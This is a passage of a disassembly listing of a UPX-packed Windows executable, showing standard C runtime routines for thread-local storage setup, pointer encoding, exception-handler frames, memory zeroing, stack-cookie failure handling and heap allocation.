mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, [edi+10h]
mov esi, [edi+0Ch]
mov [ebp+var_4], eax
mov ebx, esi
jmp short loc_40443C
; ---------------------------------------------------------------------------
loc_40440F: ; CODE XREF: sub_4043F8+4B�j
cmp esi, 0FFFFFFFFh
jnz short loc_404419
call sub_4077BF
loc_404419: ; CODE XREF: sub_4043F8+1A�j
mov ecx, [ebp+var_4]
dec esi
mov eax, esi
imul eax, 14h
add eax, ecx
mov ecx, [ebp+arg_8]
cmp [eax+4], ecx
jge short loc_404431
cmp ecx, [eax+8]
jle short loc_404436
loc_404431: ; CODE XREF: sub_4043F8+32�j
cmp esi, 0FFFFFFFFh
jnz short loc_40443F
loc_404436: ; CODE XREF: sub_4043F8+37�j
dec [ebp+arg_4]
mov ebx, [ebp+arg_0]
loc_40443C: ; CODE XREF: sub_4043F8+15�j
mov [ebp+arg_0], esi
loc_40443F: ; CODE XREF: sub_4043F8+3C�j
cmp [ebp+arg_4], 0
jge short loc_40440F
mov eax, [ebp+arg_C]
inc esi
mov [eax], esi
mov eax, [ebp+arg_10]
mov [eax], ebx
cmp ebx, [edi+0Ch]
ja short loc_404459
cmp esi, ebx
jbe short loc_40445E
loc_404459: ; CODE XREF: sub_4043F8+5B�j
call sub_4077BF
loc_40445E: ; CODE XREF: sub_4043F8+5F�j
mov eax, esi
imul eax, 14h
add eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_4043F8 endp
; =============== S U B R O U T I N E =======================================
sub_40446B proc near ; CODE XREF: sub_406E17+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov [esi], eax
call sub_404927
mov eax, [eax+98h]
mov [esi+4], eax
call sub_404927
mov [eax+98h], esi
mov eax, esi
pop esi
retn
sub_40446B endp
; =============== S U B R O U T I N E =======================================
sub_404493 proc near ; CODE XREF: sub_406F3D+60�p
arg_0 = dword ptr 4
call sub_404927
mov eax, [eax+98h]
jmp short loc_4044AB
; ---------------------------------------------------------------------------
loc_4044A0: ; CODE XREF: sub_404493+1A�j
mov ecx, [eax]
cmp ecx, [esp+arg_0]
jz short loc_4044B1
mov eax, [eax+4]
loc_4044AB: ; CODE XREF: sub_404493+B�j
test eax, eax
jnz short loc_4044A0
inc eax
retn
; ---------------------------------------------------------------------------
loc_4044B1: ; CODE XREF: sub_404493+13�j
xor eax, eax
retn
sub_404493 endp
; =============== S U B R O U T I N E =======================================
sub_4044B4 proc near ; CODE XREF: sub_406F3D+9�p
arg_0 = dword ptr 4
push esi
call sub_404927
mov esi, [esp+4+arg_0]
cmp esi, [eax+98h]
jnz short loc_4044D6
call sub_404927
mov ecx, [esi+4]
mov [eax+98h], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4044D6: ; CODE XREF: sub_4044B4+10�j
call sub_404927
mov eax, [eax+98h]
jmp short loc_4044EC
; ---------------------------------------------------------------------------
loc_4044E3: ; CODE XREF: sub_4044B4+3C�j
mov ecx, [eax+4]
cmp esi, ecx
jz short loc_4044F8
mov eax, ecx
loc_4044EC: ; CODE XREF: sub_4044B4+2D�j
cmp dword ptr [eax+4], 0
jnz short loc_4044E3
pop esi
jmp sub_4077BF
; ---------------------------------------------------------------------------
loc_4044F8: ; CODE XREF: sub_4044B4+34�j
mov ecx, [esi+4]
mov [eax+4], ecx
pop esi
retn
sub_4044B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404500 proc near ; CODE XREF: sub_406E17+7F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_40F060
and [ebp+var_18], 0
lea ecx, [ebp+var_18]
xor eax, ecx
mov ecx, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
inc eax
mov [ebp+var_14], offset loc_404256
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_18], eax
lea eax, [ebp+var_18]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_407810
mov ecx, eax
mov eax, [ebp+var_18]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_404500 endp
; =============== S U B R O U T I N E =======================================
sub_40455E proc near ; CODE XREF: sub_4012D1+7�p
; sub_40137A+7�p ...
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, ds:dword_40F060
xor eax, ebp
push eax
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_40455E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404591 proc near ; CODE XREF: sub_4017AB+7�p
; sub_401882+7�p ...
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, ds:dword_40F060
xor eax, ebp
push eax
mov [ebp-10h], esp
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_404591 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4045C7 proc near ; CODE XREF: sub_4010EC+A�p
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, ds:dword_40F060
xor eax, ebp
push eax
mov [ebp-10h], eax
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_4045C7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4045FD proc near ; CODE XREF: sub_4012D1+2D�p
; sub_40137A+B6�p ...
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
retn
sub_4045FD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404611 proc near ; CODE XREF: sub_4010EC+155�p
mov ecx, [ebp-10h]
xor ecx, ebp
call sub_40224A
jmp sub_4045FD
sub_404611 endp
; =============== S U B R O U T I N E =======================================
sub_404620 proc near ; CODE XREF: sub_402095+CE�p
; sub_402191+18�p ...
and ds:dword_410A20, 0
retn
sub_404620 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404628 proc near ; CODE XREF: sub_404694+45�p
; sub_40470B+45�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
xor esi, esi
lea eax, [ebp+var_4]
inc esi
xor ebx, ebx
push eax
mov [ebp+var_8], esi
mov [ebp+var_4], ebx
call sub_405629
cmp [ebp+var_4], 5
pop ecx
jle short loc_40464E
mov eax, esi
jmp short loc_404690
; ---------------------------------------------------------------------------
loc_40464E: ; CODE XREF: sub_404628+20�j
push edi
push ebx
call dword_40C064 ; GetModuleHandleA
mov esi, [eax+3Ch]
add esi, eax
cmp [esi+6], bx
movzx eax, word ptr [esi+14h]
lea edi, [eax+esi+18h]
jbe short loc_40468C
loc_404669: ; CODE XREF: sub_404628+5C�j
push edi
push offset dword_40C210
call sub_405E50
test eax, eax
pop ecx
pop ecx
jz short loc_404688
movzx eax, word ptr [esi+6]
inc ebx
add edi, 28h
cmp ebx, eax
jb short loc_404669
jmp short loc_40468C
; ---------------------------------------------------------------------------
loc_404688: ; CODE XREF: sub_404628+50�j
and [ebp+var_8], 0
loc_40468C: ; CODE XREF: sub_404628+3F�j
; sub_404628+5E�j
mov eax, [ebp+var_8]
pop edi
loc_404690: ; CODE XREF: sub_404628+24�j
pop esi
pop ebx
leave
retn
sub_404628 endp
; =============== S U B R O U T I N E =======================================
sub_404694 proc near ; CODE XREF: sub_402569+85�p
; sub_402569+94�p ...
arg_0 = dword ptr 4
push esi
push ds:dword_40F06C
mov esi, dword_40C06C
call esi ; dword_40C06C
test eax, eax
jz short loc_4046C8
mov eax, ds:dword_40F068
cmp eax, 0FFFFFFFFh
jz short loc_4046C8
push eax
push ds:dword_40F06C
call esi ; dword_40C06C
call eax ; dword_40F068
test eax, eax
jz short loc_4046C8
mov eax, [eax+1F8h]
jmp short loc_4046EE
; ---------------------------------------------------------------------------
loc_4046C8: ; CODE XREF: sub_404694+11�j
; sub_404694+1B�j ...
push offset aKernel32_dll ; "KERNEL32.DLL"
call dword_40C064 ; GetModuleHandleA
mov esi, eax
test esi, esi
jz short loc_4046FC
call sub_404628
test eax, eax
jz short loc_4046FC
push offset aEncodepointer ; "EncodePointer"
push esi
call dword_40C068 ; GetProcAddress
loc_4046EE: ; CODE XREF: sub_404694+32�j
test eax, eax
jz short loc_4046FC
push [esp+4+arg_0]
call eax
mov [esp+4+arg_0], eax
loc_4046FC: ; CODE XREF: sub_404694+43�j
; sub_404694+4C�j ...
mov eax, [esp+4+arg_0]
pop esi
retn
sub_404694 endp
; =============== S U B R O U T I N E =======================================
sub_404702 proc near ; CODE XREF: sub_4056F7+6E�p
; sub_405819+1�p ...
push 0
call sub_404694
pop ecx
retn
sub_404702 endp
; =============== S U B R O U T I N E =======================================
sub_40470B proc near ; CODE XREF: sub_402191+9�p
; sub_402569+B�p ...
arg_0 = dword ptr 4
push esi
push ds:dword_40F06C
mov esi, dword_40C06C
call esi ; dword_40C06C
test eax, eax
jz short loc_40473F
mov eax, ds:dword_40F068
cmp eax, 0FFFFFFFFh
jz short loc_40473F
push eax
push ds:dword_40F06C
call esi ; dword_40C06C
call eax ; dword_40F068
test eax, eax
jz short loc_40473F
mov eax, [eax+1FCh]
jmp short loc_404765
; ---------------------------------------------------------------------------
loc_40473F: ; CODE XREF: sub_40470B+11�j
; sub_40470B+1B�j ...
push offset aKernel32_dll ; "KERNEL32.DLL"
call dword_40C064 ; GetModuleHandleA
mov esi, eax
test esi, esi
jz short loc_404773
call sub_404628
test eax, eax
jz short loc_404773
push offset aDecodepointer ; "DecodePointer"
push esi
call dword_40C068 ; GetProcAddress
loc_404765: ; CODE XREF: sub_40470B+32�j
test eax, eax
jz short loc_404773
push [esp+4+arg_0]
call eax
mov [esp+4+arg_0], eax
loc_404773: ; CODE XREF: sub_40470B+43�j
; sub_40470B+4C�j ...
mov eax, [esp+4+arg_0]
pop esi
retn
sub_40470B endp
; =============== S U B R O U T I N E =======================================
sub_404779 proc near ; DATA XREF: sub_404A60+8A�o
call dword_40C070 ; TlsAlloc
retn 4
sub_404779 endp
; =============== S U B R O U T I N E =======================================
sub_404782 proc near ; CODE XREF: sub_4048B0+10�p
push esi
push ds:dword_40F06C
call dword_40C06C ; TlsGetValue
mov esi, eax
test esi, esi
jnz short loc_4047B0
push ds:dword_40FE24
call sub_40470B
pop ecx
mov esi, eax
push esi
push ds:dword_40F06C
call dword_40C074 ; TlsSetValue
loc_4047B0: ; CODE XREF: sub_404782+11�j
mov eax, esi
pop esi
retn
sub_404782 endp
; =============== S U B R O U T I N E =======================================
sub_4047B4 proc near ; CODE XREF: sub_404A60+12�p
; sub_404A60:loc_404BDA�p
mov eax, ds:dword_40F068
cmp eax, 0FFFFFFFFh
jz short loc_4047D4
push eax
push ds:dword_40FE2C
call sub_40470B
pop ecx
call eax ; dword_40F068
or ds:dword_40F068, 0FFFFFFFFh
loc_4047D4: ; CODE XREF: sub_4047B4+8�j
mov eax, ds:dword_40F06C
cmp eax, 0FFFFFFFFh
jz short loc_4047EC
push eax
call dword_40C078 ; TlsFree
or ds:dword_40F06C, 0FFFFFFFFh
loc_4047EC: ; CODE XREF: sub_4047B4+28�j
jmp sub_4078A5
sub_4047B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4047F1 proc near ; CODE XREF: sub_4048B0+4D�p
; sub_404A60+162�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 0Ch
push offset dword_40DEA0
call __SEH_prolog4
push offset aKernel32_dll ; "KERNEL32.DLL"
call dword_40C064 ; GetModuleHandleA
mov [ebp+var_1C], eax
mov esi, [ebp+arg_0]
mov dword ptr [esi+5Ch], offset dword_40F2B8
xor edi, edi
inc edi
mov [esi+14h], edi
test eax, eax
jz short loc_40484E
call sub_404628
test eax, eax
jz short loc_40484E
push offset aEncodepointer ; "EncodePointer"
push [ebp+var_1C]
mov ebx, dword_40C068
call ebx ; dword_40C068
mov [esi+1F8h], eax
push offset aDecodepointer ; "DecodePointer"
push [ebp+var_1C]
call ebx ; dword_40C068
mov [esi+1FCh], eax
loc_40484E: ; CODE XREF: sub_4047F1+2C�j
; sub_4047F1+35�j
mov [esi+70h], edi
mov byte ptr [esi+0C8h], 43h
mov byte ptr [esi+14Bh], 43h
mov eax, offset dword_40F5B8
mov [esi+68h], eax
push eax
call dword_40C07C ; InterlockedIncrement
push 0Ch
call sub_4079D2
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+arg_4]
mov [esi+6Ch], eax
test eax, eax
jnz short loc_40488C
mov eax, ds:off_40F5A8
mov [esi+6Ch], eax
loc_40488C: ; CODE XREF: sub_4047F1+91�j
push dword ptr [esi+6Ch]
call sub_407B43
pop ecx
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4048A7
call __SEH_epilog4
retn
sub_4047F1 endp
; =============== S U B R O U T I N E =======================================
sub_4048A7 proc near ; CODE XREF: sub_4047F1+AB�p
; DATA XREF: UPX1:0040DEB8�o
push 0Ch
call sub_4078FA
pop ecx
retn
sub_4048A7 endp
; =============== S U B R O U T I N E =======================================
sub_4048B0 proc near ; CODE XREF: sub_404927+1�p sub_4053C0�p ...
push esi
push edi
call dword_40C088 ; RtlGetLastWin32Error
push ds:dword_40F068
mov edi, eax
call sub_404782
call eax
mov esi, eax
test esi, esi
jnz short loc_40491B
push 214h
push 1
call sub_405413
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_40491B
push esi
push ds:dword_40F068
push ds:dword_40FE28
call sub_40470B
pop ecx
call eax
test eax, eax
jz short loc_404912
push 0
push esi
call sub_4047F1
pop ecx
pop ecx
call dword_40C084 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_40491B
; ---------------------------------------------------------------------------
loc_404912: ; CODE XREF: sub_4048B0+48�j
push esi
call sub_404F20
pop ecx
xor esi, esi
loc_40491B: ; CODE XREF: sub_4048B0+1B�j
; sub_4048B0+2F�j ...
push edi
call dword_40C080 ; RtlSetLastWin32Error
pop edi
mov eax, esi
pop esi
retn
sub_4048B0 endp
; =============== S U B R O U T I N E =======================================
sub_404927 proc near ; CODE XREF: sub_404286+89�p
; sub_40446B+B�p ...
push esi
call sub_4048B0
mov esi, eax
test esi, esi
jnz short loc_40493B
push 10h
call sub_405549
pop ecx
loc_40493B: ; CODE XREF: sub_404927+A�j
mov eax, esi
pop esi
retn
sub_404927 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40493F proc near ; DATA XREF: sub_404A60+115�o
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_40DEC0
call __SEH_prolog4
mov esi, [ebp+arg_0]
test esi, esi
jz loc_404A40
mov eax, [esi+24h]
test eax, eax
jz short loc_404964
push eax
call sub_404F20
pop ecx
loc_404964: ; CODE XREF: sub_40493F+1C�j
mov eax, [esi+2Ch]
test eax, eax
jz short loc_404972
push eax
call sub_404F20
pop ecx
loc_404972: ; CODE XREF: sub_40493F+2A�j
mov eax, [esi+34h]
test eax, eax
jz short loc_404980
push eax
call sub_404F20
pop ecx
loc_404980: ; CODE XREF: sub_40493F+38�j
mov eax, [esi+3Ch]
test eax, eax
jz short loc_40498E
push eax
call sub_404F20
pop ecx
loc_40498E: ; CODE XREF: sub_40493F+46�j
mov eax, [esi+44h]
test eax, eax
jz short loc_40499C
push eax
call sub_404F20
pop ecx
loc_40499C: ; CODE XREF: sub_40493F+54�j
mov eax, [esi+48h]
test eax, eax
jz short loc_4049AA
push eax
call sub_404F20
pop ecx
loc_4049AA: ; CODE XREF: sub_40493F+62�j
mov eax, [esi+5Ch]
cmp eax, offset dword_40F2B8
jz short loc_4049BB
push eax
call sub_404F20
pop ecx
loc_4049BB: ; CODE XREF: sub_40493F+73�j
push 0Dh
call sub_4079D2
pop ecx
and [ebp+ms_exc.disabled], 0
mov edi, [esi+68h]
test edi, edi
jz short loc_4049E8
push edi
call dword_40C08C ; InterlockedDecrement
test eax, eax
jnz short loc_4049E8
cmp edi, offset dword_40F5B8
jz short loc_4049E8
push edi
call sub_404F20
pop ecx
loc_4049E8: ; CODE XREF: sub_40493F+8D�j
; sub_40493F+98�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_404A4B
push 0Ch
call sub_4079D2
pop ecx
mov [ebp+ms_exc.disabled], 1
mov edi, [esi+6Ch]
test edi, edi
jz short loc_404A2D
push edi
call sub_407BC9
pop ecx
cmp edi, ds:off_40F5A8
jz short loc_404A2D
cmp edi, offset dword_40F4D0
jz short loc_404A2D
cmp dword ptr [edi], 0
jnz short loc_404A2D
push edi
call sub_407A03
pop ecx
loc_404A2D: ; CODE XREF: sub_40493F+C9�j
; sub_40493F+D8�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_404A57
push esi
call sub_404F20
pop ecx
loc_404A40: ; CODE XREF: sub_40493F+11�j
call __SEH_epilog4
retn 4
sub_40493F endp
; =============== S U B R O U T I N E =======================================
sub_404A48 proc near ; DATA XREF: UPX1:0040DED8�o
mov esi, [ebp+8]
sub_404A48 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404A4B proc near ; CODE XREF: sub_40493F+B0�p
push 0Dh
call sub_4078FA
pop ecx
retn
sub_404A4B endp
; =============== S U B R O U T I N E =======================================
sub_404A54 proc near ; DATA XREF: UPX1:0040DEE4�o
mov esi, [ebp+8]
sub_404A54 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404A57 proc near ; CODE XREF: sub_40493F+F5�p
push 0Ch
call sub_4078FA
pop ecx
retn
sub_404A57 endp
; =============== S U B R O U T I N E =======================================
sub_404A60 proc near ; CODE XREF: start:loc_404046�p
push edi
push offset aKernel32_dll ; "KERNEL32.DLL"
call dword_40C064 ; GetModuleHandleA
mov edi, eax
test edi, edi
jnz short loc_404A7B
call sub_4047B4
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_404A7B: ; CODE XREF: sub_404A60+10�j
push esi
mov esi, dword_40C068
push offset aFlsalloc ; "FlsAlloc"
push edi
call esi ; dword_40C068
push offset aFlsgetvalue ; "FlsGetValue"
push edi
mov ds:dword_40FE20, eax
call esi ; dword_40C068
push offset aFlssetvalue ; "FlsSetValue"
push edi
mov ds:dword_40FE24, eax
call esi ; dword_40C068
push offset aFlsfree ; "FlsFree"
push edi
mov ds:dword_40FE28, eax
call esi ; dword_40C068
cmp ds:dword_40FE20, 0
mov esi, dword_40C074
mov ds:dword_40FE2C, eax
jz short loc_404ADB
cmp ds:dword_40FE24, 0
jz short loc_404ADB
cmp ds:dword_40FE28, 0
jz short loc_404ADB
test eax, eax
jnz short loc_404AFF
loc_404ADB: ; CODE XREF: sub_404A60+63�j
; sub_404A60+6C�j ...
mov eax, dword_40C06C
mov ds:dword_40FE24, eax
mov eax, dword_40C078
mov ds:dword_40FE20, offset sub_404779
mov ds:dword_40FE28, esi
mov ds:dword_40FE2C, eax
loc_404AFF: ; CODE XREF: sub_404A60+79�j
call dword_40C070 ; TlsAlloc
cmp eax, 0FFFFFFFFh
mov ds:dword_40F06C, eax
jz loc_404BDF
push ds:dword_40FE24
push eax
call esi ; dword_40C074
test eax, eax
jz loc_404BDF
call sub_405819
push ds:dword_40FE20
call sub_404694
push ds:dword_40FE24
mov ds:dword_40FE20, eax
call sub_404694
push ds:dword_40FE28
mov ds:dword_40FE24, eax
call sub_404694
push ds:dword_40FE2C
mov ds:dword_40FE28, eax
call sub_404694
add esp, 10h
mov ds:dword_40FE2C, eax
call sub_40785C
test eax, eax
jz short loc_404BDA
push offset sub_40493F
push ds:dword_40FE20
call sub_40470B
pop ecx
call eax ; TlsFree
cmp eax, 0FFFFFFFFh
mov ds:dword_40F068, eax
jz short loc_404BDA
push 214h
push 1
call sub_405413
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_404BDA
push esi
push ds:dword_40F068
push ds:dword_40FE28
call sub_40470B
pop ecx
call eax ; TlsFree
test eax, eax
jz short loc_404BDA
push 0
push esi
call sub_4047F1
pop ecx
pop ecx
call dword_40C084 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
xor eax, eax
inc eax
jmp short loc_404BE1
; ---------------------------------------------------------------------------
loc_404BDA: ; CODE XREF: sub_404A60+113�j
; sub_404A60+130�j ...
call sub_4047B4
loc_404BDF: ; CODE XREF: sub_404A60+AD�j
; sub_404A60+BE�j
xor eax, eax
loc_404BE1: ; CODE XREF: sub_404A60+178�j
pop esi
pop edi
retn
sub_404A60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404BE4 proc near ; CODE XREF: sub_404C3B+31�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4
mov [ebp+var_4], edi
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_4]
shr ecx, 7
pxor xmm0, xmm0
jmp short loc_404C04
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h, 4 dup(0)
align 4
loc_404C04: ; CODE XREF: sub_404BE4+16�j
; sub_404BE4+4E�j
movdqa oword ptr [edi], xmm0
movdqa oword ptr [edi+10h], xmm0
movdqa oword ptr [edi+20h], xmm0
movdqa oword ptr [edi+30h], xmm0
movdqa oword ptr [edi+40h], xmm0
movdqa oword ptr [edi+50h], xmm0
movdqa oword ptr [edi+60h], xmm0
movdqa oword ptr [edi+70h], xmm0
lea edi, [edi+80h]
dec ecx
jnz short loc_404C04
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_404BE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C3B proc near ; CODE XREF: sub_4021D0+27�j
; sub_404C3B+7D�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_4], edi
mov eax, [ebp+arg_0]
cdq
mov edi, eax
xor edi, edx
sub edi, edx
and edi, 0Fh
xor edi, edx
sub edi, edx
test edi, edi
jnz short loc_404C95
mov ecx, [ebp+arg_8]
mov edx, ecx
and edx, 7Fh
mov [ebp+var_C], edx
cmp ecx, edx
jz short loc_404C7A
sub ecx, edx
push ecx
push eax
call sub_404BE4
add esp, 8
mov eax, [ebp+arg_0]
mov edx, [ebp+var_C]
loc_404C7A: ; CODE XREF: sub_404C3B+2B�j
test edx, edx
jz short loc_404CC3
add eax, [ebp+arg_8]
sub eax, edx
mov [ebp+var_8], eax
xor eax, eax
mov edi, [ebp+var_8]
mov ecx, [ebp+var_C]
rep stosb
mov eax, [ebp+arg_0]
jmp short loc_404CC3
; ---------------------------------------------------------------------------
loc_404C95: ; CODE XREF: sub_404C3B+1C�j
neg edi
add edi, 10h
mov [ebp+var_10], edi
xor eax, eax
mov edi, [ebp+arg_0]
mov ecx, [ebp+var_10]
rep stosb
mov eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
add ecx, eax
sub edx, eax
push edx
push 0
push ecx
call sub_404C3B
add esp, 0Ch
mov eax, [ebp+arg_0]
loc_404CC3: ; CODE XREF: sub_404C3B+41�j
; sub_404C3B+58�j
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_404C3B endp
; =============== S U B R O U T I N E =======================================
sub_404CCA proc near ; DATA XREF: UPX0:0040C148�o
and ds:dword_410A18, 0
call sub_408498
mov ds:dword_410A18, eax
xor eax, eax
retn
sub_404CCA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CDE proc near ; CODE XREF: sub_40224A:loc_402254�j
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 328h
mov ds:dword_40FF38, eax
mov ds:dword_40FF34, ecx
mov ds:dword_40FF30, edx
mov ds:dword_40FF2C, ebx
mov ds:dword_40FF28, esi
mov ds:dword_40FF24, edi
mov ds:word_40FF50, ss
mov ds:word_40FF44, cs
mov ds:word_40FF20, ds
mov ds:word_40FF1C, es
mov ds:word_40FF18, fs
mov ds:word_40FF14, gs
pushf
pop ds:dword_40FF48
mov eax, [ebp+0]
mov ds:dword_40FF3C, eax
mov eax, [ebp+4]
mov ds:dword_40FF40, eax
lea eax, [ebp+arg_0]
mov ds:dword_40FF4C, eax
mov eax, [ebp+var_320]
mov ds:dword_40FE88, 10001h
mov eax, ds:dword_40FF40
mov ds:dword_40FE3C, eax
mov ds:dword_40FE30, 0C0000409h
mov ds:dword_40FE34, 1
mov eax, ds:dword_40F060
mov [ebp+var_328], eax
mov eax, ds:dword_40F064
mov [ebp+var_324], eax
call dword_40C040 ; IsDebuggerPresent
mov ds:dword_40FE80, eax
push 1
call sub_404620
pop ecx
push 0
call dword_40C03C ; SetUnhandledExceptionFilter
push offset off_40C274
call dword_40C038 ; UnhandledExceptionFilter
cmp ds:dword_40FE80, 0
jnz short loc_404DCE
push 1
call sub_404620
pop ecx
loc_404DCE: ; CODE XREF: sub_404CDE+E6�j
push 0C0000409h
call dword_40C034 ; GetCurrentProcess
push eax
call dword_40C030 ; TerminateProcess
leave
retn
sub_404CDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404DE2 proc near ; CODE XREF: sub_404E31+59�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_40DEE8
call __SEH_prolog4
and [ebp+var_1C], 0
mov esi, [ebp+arg_0]
cmp esi, ds:dword_4108D4
ja short loc_404E1F
push 4
call sub_4079D2
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_408D21
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_404E28
loc_404E1F: ; CODE XREF: sub_404DE2+19�j
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_404DE2 endp
; =============== S U B R O U T I N E =======================================
sub_404E28 proc near ; CODE XREF: sub_404DE2+38�p
; DATA XREF: UPX1:0040DF00�o
push 4
call sub_4078FA
pop ecx
retn
sub_404E28 endp
; =============== S U B R O U T I N E =======================================
sub_404E31 proc near ; CODE XREF: sub_402371+18�p
; sub_4023F1+1F�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
cmp ebp, 0FFFFFFE0h
ja loc_404EDE
push ebx
mov ebx, dword_40C050
push esi
push edi
loc_404E48: ; CODE XREF: sub_404E31+94�j
xor esi, esi
cmp ds:dword_4105D4, esi
mov edi, ebp
jnz short loc_404E6C
call sub_4060C3
push 1Eh
call sub_405F23
push 0FFh
call sub_405593
pop ecx
pop ecx
loc_404E6C: ; CODE XREF: sub_404E31+21�j
mov eax, ds:dword_4108E4
cmp eax, 1
jnz short loc_404E84
cmp ebp, esi
jz short loc_404E7E
mov eax, ebp
jmp short loc_404E81
; ---------------------------------------------------------------------------
loc_404E7E: ; CODE XREF: sub_404E31+47�j
xor eax, eax
inc eax
loc_404E81: ; CODE XREF: sub_404E31+4B�j
push eax
jmp short loc_404EA2
; ---------------------------------------------------------------------------
loc_404E84: ; CODE XREF: sub_404E31+43�j
cmp eax, 3
jnz short loc_404E94
push ebp
call sub_404DE2
cmp eax, esi
pop ecx
jnz short loc_404EAB
loc_404E94: ; CODE XREF: sub_404E31+56�j
cmp ebp, esi
jnz short loc_404E9B
xor edi, edi
inc edi
loc_404E9B: ; CODE XREF: sub_404E31+65�j
add edi, 0Fh
and edi, 0FFFFFFF0h
push edi
loc_404EA2: ; CODE XREF: sub_404E31+51�j
push esi
push ds:dword_4105D4
call ebx ; dword_40C050
loc_404EAB: ; CODE XREF: sub_404E31+61�j
mov esi, eax
test esi, esi
jnz short loc_404ED7
cmp ds:dword_410774, eax
push 0Ch
pop edi
jz short loc_404EC9
push ebp
call sub_404EFE
test eax, eax
pop ecx
jnz short loc_404E48
jmp short loc_404ED0
; ---------------------------------------------------------------------------
loc_404EC9: ; CODE XREF: sub_404E31+89�j
call sub_4053C0
mov [eax], edi
loc_404ED0: ; CODE XREF: sub_404E31+96�j
call sub_4053C0
mov [eax], edi
loc_404ED7: ; CODE XREF: sub_404E31+7E�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_404EDE: ; CODE XREF: sub_404E31+8�j
